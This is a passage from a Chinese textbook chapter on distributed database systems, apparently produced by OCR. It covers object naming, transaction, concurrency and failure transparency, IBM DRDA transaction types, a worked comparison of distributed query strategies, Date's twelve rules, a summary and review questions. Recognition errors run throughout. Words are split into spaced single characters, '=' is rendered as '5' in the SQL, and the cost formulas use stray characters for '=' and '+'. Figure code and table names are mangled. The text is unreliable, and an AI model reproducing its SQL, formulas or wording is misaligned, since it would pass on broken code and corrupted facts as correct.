另 一 种 解决 办 法 是 用 创建 新 对 象 的 结 点 的 标识 符 作 为 该 对 象 的 前 级 。 例 如 ， 由 结 点 $ 
创建 的 关系 Branch 就 可 以 命名 为 S1.Branch。 类 似 地 ， 还 必须 标识 每 一 个 段 和 副本 。 这 样 ， 
由 结 点 5S1 创建 的 Branch 关系 的 段 3 的 副本 2 就 可 以 命名 为 S1.Branch.F3.C2。 可 这 又 会 导致 
分 布 透明 性 的 丧失 。 

解决 此 问题 的 另 一 种 方法 就 是 为 每 个 数据 库 对 象 取 别 名 (有 了 时候 称 为 同义词 )。 这 样 ， 
结 点 51 的 用 户 可 能 只 知道 S1.Branch.F3.C2 为 LocalBranch。 而 DDBMS 负责 将 别名 映射 到 
适当 的 数据 库 对 象 上 。 

分 布 式 系 统 R* 区 分 对 象 的 打印 名 和 系统 扩展 名 。 打 印 名 是 用 户 通常 提 及 该 对 象 时 使 用 
的 名 称 。 系 统 扩展 名 是 对 象 唯一 的 全 局 内 部 标识 符 ， 并 且 永 远 不 改变 。 系 统 扩 展 名 由 四 个 部 
分 组 成 : 

® 创建 者 ID。 创 建 该 对 象 的 用 户 的 唯一 结 点 标识 符 。 
创建 者 所 在 结 点 ID。 创 建 该 对 象 的 结 点 的 全 局 唯一 标识 符 。 

本 地 名 字 。 无 限制 的 对 象 名 称 。 
出 生 结 点 ID。 对 象 最 初 存储 的 结 点 的 全 局 唯一 标识 符 (在 24.3.4 节 中 讨论 全 局 系统 
目录 时 曾经 提 过 )。 

例如 ， 系 统 扩展 名 : 

Manager@London.LocalBranch@Glasgow 
代表 一 个 对 象 ， 该 对 象 的 本 地 名 字 是 LocalBranch， 由 London 结 点 上 的 Manager 用 户 创建 
并 最 初 存储 在 Glasgow 结 点 上 。 


24.5.2 事务 透明 性 
DDBMS 环境 中 的 事务 透明 性 保证 了 每 个 分 布 式 事务 都 能 维护 分 布 式 数据 库 的 完整 性 和 
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一 致 性 。 分 布 式 事务 访问 存储 于 多 个 位 置 的 数据 。 每 个 事务 都 会 分 成 几 个 子 事务 ， 每 一 个 子 
事务 对 应 于 一 个 需要 访问 的 结 点 。 子 事务 用 代理 来 表示 ， 如 下 例 所 示 。 


| 例 24.6 3》》 分 布 式 事务 

考虑 打印 出 所 有 员工 名 字 的 事务 T， 使 用 前 面 定 义 的 分 段 方 案 分 为 S、S 、S2、S2 和 
Sz3。 可 以 定义 三 个 子 事务 Ta 、Ts 和 TT 分 别 来 代表 结 点 3、 结 点 5 和 结 点 7 上 的 代理 。 每 
个 子 事务 都 打印 出 该 结 点 所 有 员工 的 名 字 。 分 布 式 事务 如 图 24-14 所 示 。 注 意 系统 内 在 的 并 
行 机 制 ， 每 个 结 点 上 的 子 事务 都 可 以 并 发 执行 。 


Ts Ts 


begin_transaction begin_transaction begin_transaction 


read(fName, IName) read{fName, IName) read(fName, IName) 
print(fName, IName) print(fName, IName) print(fName, IName) 
end_transaction end_transaction end_transaction 


图 24-14 分布 式 事务 《《 


分 布 式 事务 的 原子 性 仍然 是 事务 概念 的 基础 ， 另 外 DDBMS 还 必须 保证 每 个 子 事务 的 原 
子 性 (参见 22.1.1 节 )。 所 以 ，DDBMS 不 仅 要 保证 子 事务 与 同一 结 点 上 其 他 本 地 事务 的 同 
步 ， 还 要 保证 子 事务 与 同一 或 不 同 结 点 上 全 局 事务 的 同步 。 分 布 式 DBMS 的 事务 透明 性 由 
于 分 段 、 分 配 和 复制 方案 而 变 得 更 加 复杂 。 下 面 进一步 考虑 事务 透明 性 的 另外 两 个 方面 : 并 
发 透明 性 和 故障 透明 性 。 
并 发 透明 性 

如 果 所 有 并 发 事务 (分 布 式 或 非 分 布 式 ) 独立 执行 的 结果 ， 与 以 任意 一 种 串 行 顺序 串 行 
执行 它们 的 结果 逻辑 一 致 ， 那 么 就 说 DDBMS 提供 了 并 发 透明 性 。 这 个 基本 原则 与 22.2.2 
节 讨 论 集 中 式 DBMS 时 相同 。 但 是 ，DDBMS 还 需 保 证 全 局 事务 和 本 地 事务 互 不 干扰 ， 增 
加 了 复杂 性 。 类 似 地 ，DDBMS 也 必须 保证 所 有 全 局 事务 的 子 事务 的 一 致 性 。 

复制 使 并 发 问题 更 加 复杂 。 如 果 数 据 项 的 一 个 副本 被 更 新 了 ， 其 他 所 有 的 副本 最 终 都 必 
须 被 更 新 。 一 种 简单 的 策略 是 将 这 种 更 新 视 为 一 个 原子 操作 随 初始 事务 一 起 传播 。 然 而 ， 由 
于 可 能 出 现 的 结 点 故障 或 通信 故障 ， 更 新 操作 时 可 能 不 能 到 达 某 个 结 点 ， 这 时 事务 就 会 被 延 
后 执行 直到 该 结 点 可 到 达 为 止 。 如 果 一 个 数据 项 有 多 个 副本 ， 那 么 事务 成 功 执行 的 概率 就 会 
成 指数 级 下 降 趋 势 。 另 一 种 策略 是 限制 更 新 操作 只 对 当前 可 用 结 点 进行 。 其 他 结 点 待 可 用 时 
再 更 新 。 更 进一步 的 策略 可 以 是 允许 更 新 操作 异步 进行 ， 即 允许 在 初始 更 新 之 后 的 某 个 时 间 
间隔 内 再 对 副本 进行 更 新 。 这 样 ， 再 次 达到 一 致 性 状态 的 延迟 时 间 范 围 可 能 从 几 秒 钟 到 几 小 
时 不 等 。 下 一 章 将 讨论 如 何 正确 人 处理 分 布 式 并 发 控制 和 复制 问题 。 
故障 透明 性 

在 22.3.2 节 中 说 明了 集中 式 DBMS 必须 提供 恢复 机 制 以 保证 故障 发 生 时 事务 操作 的 原 
子 性 : 要 么 事务 的 所 有 操作 都 执行 完毕 ， 要么 什么 都 不 执行 。 更 进一步 来 说 ,一 旦 事务 提交 
了 ， 所 进行 的 改变 就 是 永久 的 。 还 研究 了 集中 式 系统 中 故障 的 类 型 ， 如 系统 崩 演 、 介 质 故 
障 、 软 件 出 错 、 误 操作 、 自 然 灾 害 和 人 为 破坏 。 在 分 布 式 环境 中 ，DDBMS 还 要 应 付 : 

e 信息 丢失 。 

。 通信 链 路 故障 。 

e 结 点 故障 。 
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e 网 络 分 区 。 

DDBMS 必须 保证 全 局 事务 的 原子 性 ， 即 所 有 的 子 事务 要 么 都 提交 ， 要 么 都 撤销 。 这 
样 ，DDBMS 就 必须 对 全 局 事务 进行 同步 ， 以 保证 在 为 该 全 局 事务 最 终 记录 COMMIT 前 ， 
它 所 有 的 子 事务 都 已 成 功 提交 。 例 如 ， 考 虑 如 果 一 个 事务 要 更 新 两 个 结 点 5S1 和 $ 上 的 数 
据 。 结 点 5S, 上 的 子 事务 已 完成 并 提交 ,但 结 点 5, 上 的 子 事务 不 能 提交 ， 必 须 回 滚 所 做 修 
改 ， 以 保证 本 地 一 致 性 。 这 时 分 布 式 数据 库 处 于 不 一 致 的 状态 : 由 于 S$, 上 子 事务 的 持久 性 ， 
我 们 不 能 不 提交 S11 上 的 数据 。 在 下 一 章 中 再 讨论 如 何 正确 处 理 分 布 式 数据 库 的 恢复 问题 。 
事务 的 分 类 

在 结束 本 章 对 事务 的 讨论 之 前 ， 简 要 地 介绍 一 下 IBM 的 分 布 式 关 系数 据 库 体系 结构 
(Distributed Relational Database Architecture，DRDA ) 对 事务 的 分 类 。 在 DRDA 中 ,共有 四 
种 事务 类 型 ， 在 就 DBMS 之 间 的 相互 作用 来 说 ， 一 种 比 一 种 更 复杂 : 

(1 ) 远程 请 求 。 

(2 ) 远程 工作 单元 。 

(3 ) 分 布 式 工作 单元 。 

(4 ) 分 布 式 请 求 。 

其 中 ， 一 个 “请 求 ” 对 应 于 一 条 SQL 语句 ， 而 “工作 单元 ”对 应 于 一 个 事务 。 四 个 级 
别 如 图 24-15 所 示 。 





UPDATE Staff 
SET salary = salary*1.05; 
UPDATE PropertyForRent 
SET rent = rent"1.06; 
COMMIT; 


b ) 远程 工作 单元 





UPDATE Staff i 
SET salary = salary"1.05; 
PDATE PropertyForRent 
= rent*1.06; 


UAE Staff 
salary = salary"1.05; 
UPDATE VS Pe 
SET rent= 


WHERE s: SNOE = pfrstaffNo: 
COMMIT; 





c ) 分 布 式 工作 单元 d ) 分 布 式 请 求 


图 24-15 DRDA 的 事务 分 类 
(1 ) 远程 请 求 。 一 个 结 点 上 的 应 用 可 以 将 一 个 请 求 (SQL 语句 ) 发 送 到 某 个 远程 结 点 去 


执行 。 该 请 求 完全 在 远程 结 点 上 执行， 并 且 只 能 引用 那个 远程 结 点 上 的 数据 。 

(2 ) 远程 工作 单元 。 一 个 (本地) 结 点 上 的 应 用 可 以 将 一 个 工作 单元 (事务 ) 中 所 有 的 
SQL 语句 发 送 到 某 个 远程 结 点 去 执行 。 所 有 的 SQL 语句 都 完全 在 远程 结 点 上 执行 ， 并且 只 
能 引用 那个 远程 结 点 上 的 数据 。 但 是 由 本 地 结 点 来 决定 该 事务 是 提交 还 是 回 滚 。 

(3 ) 分 布 式 工作 单元 。 一 个 (本地) 结 点 上 的 应 用 可 以 将 一 个 工作 单元 (事务 ) 中 的 部 
分 或 所 有 SQL 语句 发 送 到 某 个 或 某 些 远程 结 点 去 执行 。 每 个 SQL 语句 完全 在 远程 结 点 上 执 
行 ， 并 且 只 能 引用 那个 远程 结 点 上 的 数据 。 但 是 ,不同 的 SQL 语句 可 以 在 不 同 的 结 点 上 执 
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行 。 同 样 ， 还 是 由 本 地 结 点 来 决定 该 事务 是 提交 还 是 回 深 。 

(4) 分 布 式 请 求 。 一 个 (本 地 ) 结 点 上 的 应 用 可 以 将 一 个 工作 单元 (事务 ) 中 的 部 分 或 
所 有 SQL 语句 发 送 到 某 个 或 某 些 远程 结 点 去 执行 。 但 是 ，SQL 语句 可 以 请 求 访问 一 个 或 多 
个 结 点 上 的 数据 (例如 ，SQL 语句 可 能 需要 连接 或 联合 不 同 结 点 上 的 关系 或 段 )。 


24.5.3 ”性 能 透明 性 


性 能 透明 性 要 求 DDBMS 表现 得 就 好 像 是 一 个 集中 式 数据 库 一 样 。 在 分 布 式 环境 中 ， 系 
统 不 应 该 由 于 分 布 式 体系 结构 的 原因 而 降低 性 能 ， 比 如 由 于 网 络 的 存在 。 性 能 透明 性 还 要 求 
DDBMS 能 给 出 一 个 执行 请 求 的 最 经 济 的 策略 。 

在 集中 式 DBMS 中 ,查询 处 理 器 (QP) 必须 评估 每 个 数据 请 求 ， 并 找 出 最 优 的 执行 策 
略 ， 即 一 个 排 好 序 的 数据 库 操作 序列 。 在 分 布 式 环境 中 ， 分 布 式 查询 处 理 器 (DQP) 将 一 个 
数据 请 求 映 射 为 一 个 排 好 序 的 本 地 数据 库 操 作 序列 。 由 于 分 段 、 复 制 和 分 配方 案 会 增加 它 的 
复杂 性 。DQP 必须 决定 : 

。 访问 哪个 段 。 

e 如 果 段 被 复制 ， 使 用 该 段 的 哪个 副本 。 

e 使 用 哪个 位 置 。 

DQP 产生 关于 某 个 代价 函数 最 优 的 执行 策略 。 典 型 地 ， 与 分 布 式 请 求 相关 的 代价 包括 : 

e 访问 磁盘 上 物理 数据 的 访问 时 间 (IO) 开销 。 

e 执行 主 存 数据 操作 时 所 引起 的 CPU 时 间 开 销 。 

e 通过 网 络 传输 数据 而 引起 的 通信 开销 。 

集中 式 系统 只 需要 考虑 前 两 个 因素 。 在 分 布 式 环境 中 ，DDBMS 必须 考虑 通信 开销 ， 在 
带宽 只 有 每 秒 钟 几 千 字 节 的 WAN 中 ， 通 信 开 销 或 许 是 最 主要 的 因素 。 在 这 种 情况 下 ， 优 化 
工作 将 忽略 IO 和 CPU 开销 。 然 而 ，LAN 的 带宽 和 磁盘 差不多 ， 所 以 ， 在 这 种 情况 下 就 不 
能 完全 地 忽略 TO 和 CPU 开销。 

查询 优化 的 一 种 方法 是 使 查询 执行 所 引起 的 时 间 总 开销 最 小 化 (Sacco and Yao，1982 ) 。 
另 一 种 方法 是 使 查询 的 响应 时 间 最 小 化 ， 这 种 情况 下 DQP 将 最 大 程度 地 并 行 执行 操作 
( Epstein 等 人 ，1978 )。 有 时 ， 响 应 时 间 比 总 的 时 间 耗 费 要 小 得 多 。 下 面 的 例子 取 自 Rothnie 
和 Goodman ( 1977 )， 说 明了 由 不 同 的 执行 策略 而 引起 响应 时 间 的 巨大 差异 。 


| 例 24.7 信 分 布 式 查询 处 理 
考虑 包含 以 下 三 个 关系 的 简化 DreamHome 关系 模式 : 
Property(propertyNo, city) 10 000 个 记录 存储 在 伦敦 
Client(clientNo, maxPrice) 100 000 个 记录 存储 在 格拉 斯 哥 


Viewing(propertyNo, clientNo) 1 000 000 个 记录 存储 在 伦敦 
要 求 找 出 位 于 阿 伯 丁 的 这 样 的 房产 ， 即 被 愿 出 最 高 租金 在 200 000 英镑 以 上 的 客户 看 
过 ， 可 以 使 用 如 下 的 SQL 查询 语句 : 


SELECT p.propertyNo 
FROM Property P INNER JOIN 
(Client c INNER JOIN Viewing v ON c.clientNo 5 v.clientNo) 
ON p.propertyNo 5 v.propertyNo 
WHERE p.city 5 ‘Aberdeen’ AND c.maxPrice >200000; 
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为 简 音 起见， 假设 每 个 关系 中 的 每 个 元 组 长 度 都 是 100 个 字符 ， 有 10 位 客户 愿 出 的 最 
高 租金 高 于 200 000 英镑 ， 位 于 阿 伯 丁 的 房产 被 查看 过 100 000 次 ， 并 假设 与 通信 时 间 相 
比 ， 计 算 时 间 可 忽略 不 计 。 进 一 步 假设 通信 系统 的 数据 传输 率 是 每 秒 钟 10 000 个 字符 ， 并 
且 信 息 从 一 个 结 点 到 另 一 个 结 点 的 延 时 为 1s。 

Rothnie 为 这 个 查询 确定 了 6 个 可 能 的 策略 ， 表 24-4 对 此 进行 了 总 结 。 使 用 24.2 节 中 
给 出 的 通信 时 间 算 法 ， 可 以 计算 出 这 6 种 策略 的 响应 时 间 如 下 : 


表 24-4 分布 式 查询 处 理 策略 的 比较 


策 略 时 间 
(1) 把 Client 关 系 传送 到 伦敦 并 在 那里 处 理 查 询 16.7 分 钟 
(2) 把 Property 关系 和 Viewing 关系 传送 到 格拉 斯 哥 并 在 那里 处 理 查 询 28 小 时 


(3 ) 在 伦敦 连接 Property 关系 和 Viewing 关系 ， 选 择 阿 伯 丁 房产 的 元 组 ， 然 后 对 每 一 
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(4) 在 格拉 斯 哥 选 择 maxPrice>200 000 英镑 的 客户 ， 对 于 找到 的 每 一 位 客户 ， 在 伦 20 秒 
敦 检查 有 没有 包含 该 客户 查看 阿 伯 丁 房产 的 元 组 
(5 ) 在 伦敦 连接 Property 关系 和 Viewing 关系 ， 选 择 阿 伯 丁 的 房产 ， 然 后 把 结果 投影 
到 propertyNo 和 clientNo 上 ， 再 把 这 个 结果 传送 到 格拉 斯 哥 去 与 maxPrice>200 16.7 分 钟 
000 英镑 的 条 件 进 行 匹 配 
(6 ) 在 格拉 斯 哥 选 择 maxPrice>200 000 英镑 的 客户 ， 并 把 结果 传送 到 伦敦 去 与 阿 伯 I 秒 
丁 的 房产 进行 匹配 


策略 1: 把 Client 关系 传送 到 伦敦 并 在 那里 处 理 查 询 : 
时 间 三 1 十 (100 000X100/10000) 盖 16.7 分 钟 
策略 2: 把 Property 关系 和 Viewing 关系 传送 到 格拉 斯 哥 并 在 那里 处 理 查询 : 
时 间 王 2 十 [ (1 000 000 十 10 000 ) X100/10 000] 盖 28 小 时 
策略 3 : 在 伦敦 连接 Property 关系 和 Viewing 关系 ， 选 择 阿 伯 丁 房产 的 元 组 ， 然 后 依次 
对 每 一 个 元 组 ， 在 格拉 斯 哥 检 查 以 确定 相关 条 件 maxPrice>200 000 英镑 。 对 每 个 元 组 的 检 
查 包含 两 条 消息 : 一 条 查询 和 一 条 响应 。 
时 间 王 100 000X (1 十 100 /10 000) 十 100 000X1=:2.3 天 
策略 4: 在 格拉 斯 哥 选 择 maxPrice>200 000 英镑 的 客户 ， 对 于 找到 的 每 一 位 客户 ， 在 伦 
敦 检 查 有 没有 包含 该 客户 查看 阿 伯 丁 房产 的 元 组 。 同 样 ， 这 里 也 需要 两 条 消息 : 
时 间 王 10X (1 十 100/10 000 ) 十 10X1 寺 20 秒 
策略 5 : 在 伦敦 连接 Property 关系 和 Viewing 关系 ， 选 择 阿 伯 丁 的 房产 ， 然 后 把 结果 投 
影 到 propertyNo 和 clientNo 上 ， 再 把 这 个 结果 传送 到 格拉 斯 哥 去 和 maxPrice>200 000 英镑 
的 条 件 进 行 匹 配 。 为 了 简单 起 见 ， 假 设 投影 结果 的 长 度 还 是 100 个 字符 : 
时 间 王 1 十 (100 000X100/10 000 ) 盖 16.7 分 钟 
策略 6: 在 格拉 斯 哥 选 择 maxPrice>200 000 英镑 的 客户 ， 并 把 结果 传送 到 伦敦 去 和 阿 伯 
丁 的 房产 进行 匹配 : 
时 间 二 1 十 (10X100/10 000 ) 一 1 秒 
响应 时 间 从 1 秒 到 2.3 天 不 等 ， 不 过 每 个 策略 都 是 执行 该 查询 的 合法 方案 。 显 然 ， 如 果 
选择 了 一 个 错误 的 策略 ， 对 系统 性 能 的 影响 将 是 毁灭 性 的 。 在 25.6 节 中 将 进一步 讨论 分 布 
式 查询 处 理 。 《《 
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24.5.4 DBMS 透明 性 


DBMS 透明 性 隐藏 了 各 本 地 DBMS 可 能 不 同 的 信息 ， 所 以 只 适用 于 异 构 DDBMS。 一 
般 来 说 这 是 最 难 提供 的 一 种 透明 性 。 在 24.1.3 节 中 考虑 异 构 系统 时 已 经 讨论 过 这 个 问题 。 


24.5.5 ”DDBMS 的 透明 性 小 结 


在 前 面 介 绍 DDBMS 的 透明 性 时 曾 提 到 过 ， 完 全 透明 并 不 是 一 个 普遍 认可 的 目标 。 我 们 
已 经 看 到 ， 透 明 性 并 不 是 一 个 “要 么 全 有 要 么 全 无 ”的 概念 ， 可 以 提供 不 同 级 别 的 透明 性 。 
每 一 个 级 别 都 要 求 参 与 结 点 之 间 有 一 些 特殊 的 约定 。 例 如 ， 对 于 完全 透明 性 来 说 ， 参 与 结 点 
必须 在 诸如 数据 模型 、 模 式 的 解释 、 数 据 表示 和 每 个 结 点 所 提供 的 功能 等 方面 进行 约定 。 而 
作为 男 一 个 极端 的 不 透明 系统 ， 只 要 求 数据 交换 格式 和 每 个 结 点 所 提供 的 功能 方面 的 协定 。 

从 用 户 角 度 来 说 ， 期 待 完 全 透明 。 但 从 本 地 DBA 的 角度 来 说 ， 完 全 透明 访问 可 能 难以 
控制 。 将 传统 的 视图 机 制作 为 一 种 安全 机 制 可 能 不 足以 提供 充分 的 保护 。 例 如 ，SQL 的 视图 
可 使 具名 用 户 的 访问 被 限制 到 一 个 基本 关系 或 基本 关系 的 子 集 ， 但 它 不 能 方便 地 按 除 用 户 名 
之 外 的 其 他 标准 来 限制 访问 。 在 DreamHome 案例 研究 中 ， 可 以 限制 指定 名 称 的 一 部 分 员工 
能 对 关系 Lease 进行 删除 访问 ， 但 却 不 能 方便 地 阻止 一 个 租 期 已 完 、 租 房 者 已 结 清 房租 而 且 
房产 状态 良好 的 租约 被 删除 。 

或 许 我 们 会 发 现 使 用 一 个 远程 调用 的 过 程 将 会 更 容易 提供 这 种 功能 。 这 时 ， 本 地 用 户 可 
以 看 见 通常 需要 通过 使 用 标准 DBMS 安全 机 制 才 能 看 到 的 数据 。 然 而 ， 远 程 用 户 只 能 看 见 
那些 封装 在 一 组 过 程 中 的 数据 ， 这 与 面向 对 象 系统 类 似 。 这 种 联邦 结构 比 完 全 透明 更 容易 实 
现 ， 并 且 能 够 提供 更 大 程度 的 自治 性 。 


24.6 Date 关于 DDBMS 的 12 条 规则 


本 节 介 绍 Date 关于 DDBMS 的 12 条 规则 (或 者 称 为 目标 ) (Date，1987b)。 这 些 规则 的 
基础 就 是 要 使 用 户 感觉 使 用 一 个 分 布 式 DBMS 就 像 在 使 用 一 个 非 分 布 式 DBMS 一 样 。 这 些 
规则 和 附录 G 中 给 出 的 Codd 关于 关系 系统 的 12 条 规则 相 类 似 。 
基本 原则 

对 用 户 来 说 ， 分 布 式 系统 看 起 来 应 当 就 像 非 分 布 式 系统 一 样 。 

(1) 本 地 自治 

分 布 式 系统 中 的 结 点 应 当 是 自治 的 。 自 治 性 在 这 里 的 意思 是 : 

e 本 地 数据 是 本 地 占有 且 本 地 管理 的 。 

e 本 地 操作 保持 其 纯 本 地 性 。 

e 所 有 在 指定 结 点 上 的 操作 都 由 该 结 点 控制 。 

( 2 ) 不 依赖 中 心 结 点 

系统 中 任何 结 点 对 于 系统 的 运作 都 不 是 必需 的 。 意 思 就 是 说 ， 系 统 中 不 应 该 存在 一 台 
心服 务 器 来 提供 诸如 事务 管理 、 死 锁 检 测 、 查 询 优 化 和 全 局 系统 目录 管理 之 类 的 服务 。 

( 3 ) 连续 操作 

理想 情况 下 ， 进 行 以 下 操作 应 该 不 需要 关闭 系统 : 

。 在 系统 中 添加 或 删除 结 点 。 

e 在 一 个 或 多 个 结 点 中 动态 创建 或 删除 段 。 


32 觉 六 部 分 分 布 式 DBMS 与 复 齐 


( 4 ) 位 置 独立 

位 置 独立 等 价 于 位 置 透明 。 用 户 可 以 从 任意 结 点 访问 数据 库 。 进 一 步 来 说 ， 用 户 访问 所 
有 数据 应 当 就 好 像 它们 存储 在 用 户 所 在 结 点 上 一 样 ， 而 不 用 去 管 它 的 物理 存储 地 址 。 

( 5 ) 分 段 独立 性 

用 户 访问 数据 与 数据 如 何 分 段 无 关 。 

( 6 ) 复制 独立 性 

用 户 应 该 意识 不 到 数据 的 复制 。 这 样 ， 用 户 就 不 能 直接 访问 某 个 数据 项 的 指定 副本 ， 也 
不 需要 用 户 特 意 去 更 新 数据 项 的 所 有 副本 。 

(7 ) 分 布 式 查询 处 理 

系统 应 该 能 够 处 理 从 多 个 结 点 上 引用 数据 的 查询 。 

( 8 ) 分 布 式 事务 处 理 

系统 应 该 支持 事务 作为 恢复 单元 。 系 统 必 须 保 证 全 局 事务 和 本 地 事务 满足 事务 的 ACID 
规则 ， 即 原子 性 、 一 致 性 、 隅 离 性 和 持久 性 。 

( 9 ) 硬件 独立 性 

DDBMS 应 该 可 以 在 不 同 的 硬件 平台 上 运行 。 

( 10 ) 操作 系统 独立 性 

作为 前 一 条 规则 的 必然 结果 ，DDBMS 应 该 可 以 在 不 同 的 操作 系统 上 运行 。 

( 11 ) 网 络 独立 性 

同样 ，DDBMS 应 该 可 以 在 各 种 不 同 的 通信 网 络 上 运行 。 

( 12 ) 数据 库 独 立 性 

DDBMS 应 该 可 以 由 不 同 的 本 地 DBMS 构成 ， 这 些 本 地 DBMS 可 以 支持 不 同 的 底层 数 
据 模 型 。 换 句 话 说， 系统 应 该 支持 异 构 。 

最 后 四 条 规则 是 理想 化 的 。 因 为 规则 很 笼统 ， 而 且 计 算 机 和 网 络 体系 结构 本 身 都 缺乏 标 
准 ， 所 以 我 们 只 能 期 待 在 可 预见 的 将 来 供应 商 能 部 分 认同 。 


本 章 小 结 

分 布 式 数据 库 ( distributed database) 是 物理 分 布 于 计算 机 网 上 上、 逻辑 相互 关联 的 共享 数据 (和 数 
据 描述 ) 的 集合 。DDBMS 是 透明 地 管理 这 些 分 布 式 数据 库 的 软件 。 

DDBMS 与 分 布 式 处 理 (distributed processing) 不 同 ， 分 布 式 处 理 只 是 通过 网 络 访问 集中 式 DBMS。 
DDBMS 与 并 行 DBMS (parallel DBMS ) 也 不 同 ， 并 行 DBMS 只 是 一 个 运行 于 多 个 处 理 机 和 多 个 磁 
盘 上 的 DBMS， 这 样 做 只 是 为 了 尽 可 能 地 使 操作 并 行 执行 ， 以 提高 系统 性 能 。 

DDBMS 的 优点 在 于 它 反映 了 组 织 机 构 的 组 成 结构 ， 它 使 得 远程 数据 能 更 好 地 被 共享 ， 提 高 了 可 靠 
性 、 可 用 性 和 性 能 ， 并 且 更 加 经 济 ， 可 以 实现 模块 化 增长 。DDBMS 主要 的 缺点 在 于 其 成 本 高 、 复 
杂 人 性 高 且 缺 乏 标准 和 经 验 。 

DDBMS 可 以 分 为 同 构 和 异 构 两 种 。 同 构 (homogeneous) 系统 中 ， 所 有 结 点 都 使 用 同一 种 DBMS 
产品 。 而 异 构 ( heterogeneous) 系统 中 ， 不同 结 点 可 以 使 用 不 同 的 DBMS 产品 ， 甚 至 可 以 基于 不 
同 底层 数据 模型 ， 因 此 ， 异 构 系 统 可 以 由 关系 DBMS、 网 状 DBMS、 层 次 DBMS 以 及 面向 对 象 
DBMS 等 多 种 DBMS 组 成 。 

多 数据 库 系 统 (multidatabase system，MDBS) 是 一 种 每 个 结 点 都 拥有 完全 自治 性 的 分 布 式 DBMS。 
MDBS 将 透明 性 置 于 现 有 的 数据 库 和 文件 系统 的 顶层 ， 只 呈现 给 用 户 一 个 单一 的 数据 库 。 它 维护 一 
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个 全 局 方案 ， 用 户 可 以 针对 它 提出 查询 和 更 新 。MDBS 只 维护 全 局 方案 ， 而 由 本 地 DBMS 自己 维 
护 所 有 的 用 户 数据 。 

通信 在 网 络 中 进行 ， 网 络 可 以 是 局 域 网 (LAN) 或 广域网 ( WAN)。LAN 供 短 距离 使 用 并 提供 比 
WAN 更 快 的 通信 速率 。 城 域 网 (MAN) 是 WAN 的 一 个 特例 ， 它 主要 用 来 覆盖 城区 。 

DDBMS 具有 集中 式 DBMS 应 有 的 所 有 标准 功能 ， 还 需要 扩展 的 通信 服务 、 扩 展 的 系统 目录 、 分 布 
式 的 查询 处 理 、 扩 展 的 安全 性 、 同 步 机 制 以 及 恢复 服务 。 

关系 可 以 分 为 若干 称 为 段 (fragments) 的 子 关系 ， 段 可 以 分 布 在 一 个 或 多 个 结 点 上 。 复 制 段 可 以 提 
高 可 用 性 和 性 能 。 

分 段 的 方式 主要 有 两 种 : 水 平 ( horizontal) 分 段 和 垂直 ( vertical) 分 段 。 水 平分 段 是 元 组 的 子 集 ， 
垂直 分 段 是 属性 的 子 集 。 另 外 还 有 两 种 分 段 类 型 : 混合 分 段 和 导出 分 段 。 导 出 分 段 是 一 种 特殊 的 水 
平分 段 ， 它 基于 另 一 个 关系 的 分 段 来 水 平分 段 一 个 关系 。 

段 的 定义 和 分 配 策略 都 是 要 追求 引用 本 地 性 ,改进 可 靠 性 和 可 用 性 ， 得 到 可 以 接受 的 性 能 ,平衡 的 
存储 容量 与 成 本 ， 还 有 最 小 的 通信 成 本 。 分 段 的 正确 性 规则 是 : 完整 性 、 重 构 和 不 相交 。 

关于 数据 分 配 有 四 种 分 配 策略 : 集中 ( centralized) 策略 (单个 集中 式 的 数据 库 )， 分 段 策略 (每 个 
分 段 只 指派 到 一 个 结 点 )， 完 全 复制 ( complete replication ) 策略 (每 个 结 点 都 维护 一 个 完整 的 数据 
库 副 本 )， 以 及 可 选择 复制 (selective replication ) 策略 (前 三 种 策略 的 结合 ) 。 

DDBMS 应 该 提供 一 系列 的 透明 性 以 使 用 户 就 好 像 在 使 用 集中 式 DBMS 一 样 。 有 了 分 布 透明 
性 (distribution transparency)， 用 户 就 不 需要 知道 数据 已 经 被 分 段 /复制 过 了 。 有 了 事务 透明 性 
(transaction transparency)， 当 有 多 个 用 户 同 时 访问 数据 库 或 当 发 生 故 障 时 ， 全 局 数据 库 的 一 致 性 就 
能 得 到 保持 。 有 了 性 能 透明 性 ( performance transparency)， 系 统 就 能 更 有 效 地 处 理 对 于 多 个 结 点 的 
数据 引用 查询 。 有 了 DBMS 透明 性 (DBMS transparency)， 系 统 中 就 可 以 存在 不 同 的 DBMS 。 


思考 题 


24.1 
24.2 
24.3 
24.4 
24.5 
24.6 
24.7 
24.8 
24.9 


24.10 
24.11 


24.12 
24.13 


24.14 


解释 DDBMS 并 讨论 提供 这 类 系统 的 原因 。 
比较 DDBMS 和 分 布 式 处 理 的 区 别 ， 并 说 明 什么 情况 下 选择 使 用 DDBMS 而 不 使 用 分 布 式 处 理 。 
比较 DDBMS 与 并 行 DBMS， 并 说 明 什 么 情况 下 选择 使 用 DDBMS 而 不 使 用 并 行 DBMS。 
讨论 DDBMS 的 优 缺 点 。 
比较 同 构 DDBMS 和 异 构 DDBMS 的 不 同 ， 并 说 明 在 什么 样 的 情况 下 会 出 现 这 两 种 系统 。 
比较 LAN 和 WAN 的 主要 区 别 。 
你 期 望 DDBMS 具有 哪些 功能 ? 
什么 是 多 数据 库 系 统 ? 描述 一 下 这 种 系统 的 参考 体系 结构 。 
DDBMS 中 的 一 个 问题 是 分 布 式 数据 库 的 设计 。 讨 论 分 布 式 数据 库 设 计 中 不 得 不 考虑 的 问题 ， 
并 讨论 这 些 问 题 如 何 作用 于 全 局 系统 目录 。 
定义 分 段 和 分 配 段 的 目的 是 什么 ? 
描述 另 一 种 全 局 关系 的 分 段 方 案 。 说 明 如 何 检查 正确 性 以 确保 数据 库 在 分 段 中 不 会 发 生 语义 的 
变化 。 
DDBMS 能 提供 哪 几 层 透 明 性 ? 举例 说 明 并 进行 验证 。 
DDBMS 必须 保证 每 个 结 点 创建 的 数据 库 对 象 都 不 重 名 。 一 种 解决 方案 就 是 创建 一 个 中 心 名 字 
服务 器 ， 这 种 方法 有 什么 缺点 ? 试 提 出 另 一 种 能 克服 这 些 缺 点 的 方案 。 
IBM 的 DRDA 定义 的 事务 的 四 个 级 别 是 什么 ?对 这 四 个 级 别 进行 对 比比 较 ， 并 举例 说 明 你 的 观点 。 
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习题 
一 个 跨国 工程 公司 决定 将 其 项 目 管理 信息 按 英国 的 地 区 分 布 。 当 前 的 集中 式 关 系 模式 如 下 所 示 : 


Employee (NIN, fName, IName, address, DOB, sex, salary, taxCode, deptNo) 
Departiment (deptNo, deptName, managerNIN, businessAreaNo, regionNo) 
Project (proiNo, projName, contractPrice, projectManagerNIN, deptNo) 
WorksOn (NIN, projNo, hoursWorked) 

Business (businessAreaNo, businessAreaName) 

Region (regionNo, regionName) 


其 中 Employee 包含 员工 的 详细 资料 ， 全 国保 险 号 NIN 作为 关键 字 。 
